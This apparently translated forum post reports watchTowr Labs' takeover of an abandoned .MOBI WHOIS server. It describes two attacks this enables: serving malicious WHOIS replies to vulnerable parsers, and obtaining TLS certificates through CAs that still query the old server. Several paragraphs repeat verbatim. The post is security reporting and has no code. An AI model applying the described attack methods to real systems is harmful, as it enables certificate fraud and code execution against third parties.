Friend
Professional
- Messages
- 2,653
- Reaction score
- 851
- Points
- 113
Researchers from watchTowr Labs have published the results of an experiment with the capture of an outdated WHOIS service of the registrar of the .MOBI domain zone. The reason for the study was that the registrar changed the address of the WHOIS service, moving it from the whois.dotmobiregistry.net domain to a new host whois.nic.mobi. At the same time, the domain dotmobiregistry.net ceased to be used and was released in December 2023 and became available for registration.
The researchers spent $20 to buy the domain, and then ran their own dummy whois.dotmobiregistry.net WHOIS service on their server. It was surprising that many systems did not switch to the new host whois.nic.mobi continued to use the old name. From August 30 to September 4 of this year, 2.5 million requests for the old name were recorded, sent from more than 135 thousand unique systems.
Among the senders of the requests were mail servers of government and military organizations that checked email domains using WHOIS, companies specializing in security and security platforms (VirusTotal, Group-IB), as well as certificate authorities, domain verification services, SEO services and domain registrars (e.g. domain.com, godaddy.com, who.is, whois.ru, smallseo.tools, seocheki.net, centralops.net, name.com, urlscan.io and webchart.org).
The ability to return any data in response to a request to the old WHOIS service of the ".MOBI" domain zone could be used to organize attacks on senders of requests. The proposed first attack option is based on the assumption that if someone continues to send requests to a long-replaced service, they are probably doing so using outdated tools that contain vulnerabilities. For example, in 2015, the CVE-2015-5243 vulnerability was identified in phpWHOIS, which made it possible to execute attacker code when parsing specially designed data returned by the WHOIS server.
Among the WHOIS-related vulnerabilities, the CVE-2021-32749 vulnerability in the Fail2Ban package, identified in 2021, is also mentioned, which allows code execution when incorrect data is returned by the WHOIS service used in the process of generating a blocking report using the mail-whois handler (Fail2Ban without escaping the "~!" operation passed the result of a call to the WHOIS server to the mail command, but the request was formed to check the IP address, not the domain, etc.). f. the vulnerability is not applicable in the ".mobi" situation).
The second variant of the attack is based on the fact that some certification authorities provide the ability to verify domain ownership through the email specified in the domain registrar's database, accessible via the WHOIS protocol. It turned out that several certification authorities that support this method of verification continue to use the old WHOIS server for the ".MOBI" domain zone.
Thus, having gained control over the whois.dotmobiregistry.net name, attackers can return their data, perform confirmation, and obtain a TLS certificate for any domain in the .MOBI zone. For example, in an experiment, researchers requested a TLS certificate for a microsoft.mobi domain from the GlobalSign registrar and the "whois@watchTowr.com" returned by a dummy WHOIS service was shown in the interface as available to send a domain ownership verification code.
The researchers spent $20 to buy the domain, and then ran their own dummy whois.dotmobiregistry.net WHOIS service on their server. It was surprising that many systems did not switch to the new host whois.nic.mobi continued to use the old name. From August 30 to September 4 of this year, 2.5 million requests for the old name were recorded, sent from more than 135 thousand unique systems.
Among the senders of the requests were mail servers of government and military organizations that checked email domains using WHOIS, companies specializing in security and security platforms (VirusTotal, Group-IB), as well as certificate authorities, domain verification services, SEO services and domain registrars (e.g. domain.com, godaddy.com, who.is, whois.ru, smallseo.tools, seocheki.net, centralops.net, name.com, urlscan.io and webchart.org).
The ability to return any data in response to a request to the old WHOIS service of the ".MOBI" domain zone could be used to organize attacks on senders of requests. The proposed first attack option is based on the assumption that if someone continues to send requests to a long-replaced service, they are probably doing so using outdated tools that contain vulnerabilities. For example, in 2015, the CVE-2015-5243 vulnerability was identified in phpWHOIS, which made it possible to execute attacker code when parsing specially designed data returned by the WHOIS server.
Among the WHOIS-related vulnerabilities, the CVE-2021-32749 vulnerability in the Fail2Ban package, identified in 2021, is also mentioned, which allows code execution when incorrect data is returned by the WHOIS service used in the process of generating a blocking report using the mail-whois handler (Fail2Ban without escaping the "~!" operation passed the result of a call to the WHOIS server to the mail command, but the request was formed to check the IP address, not the domain, etc.). f. the vulnerability is not applicable in the ".mobi" situation).
The second variant of the attack is based on the fact that some certification authorities provide the ability to verify domain ownership through the email specified in the domain registrar's database, accessible via the WHOIS protocol. It turned out that several certification authorities that support this method of verification continue to use the old WHOIS server for the ".MOBI" domain zone.
Thus, having gained control over the whois.dotmobiregistry.net name, attackers can return their data, perform confirmation, and obtain a TLS certificate for any domain in the .MOBI zone. For example, in an experiment, researchers requested a TLS certificate for a microsoft.mobi domain from the GlobalSign registrar and the "whois@watchTowr.com" returned by a dummy WHOIS service was shown in the interface as available to send a domain ownership verification code.
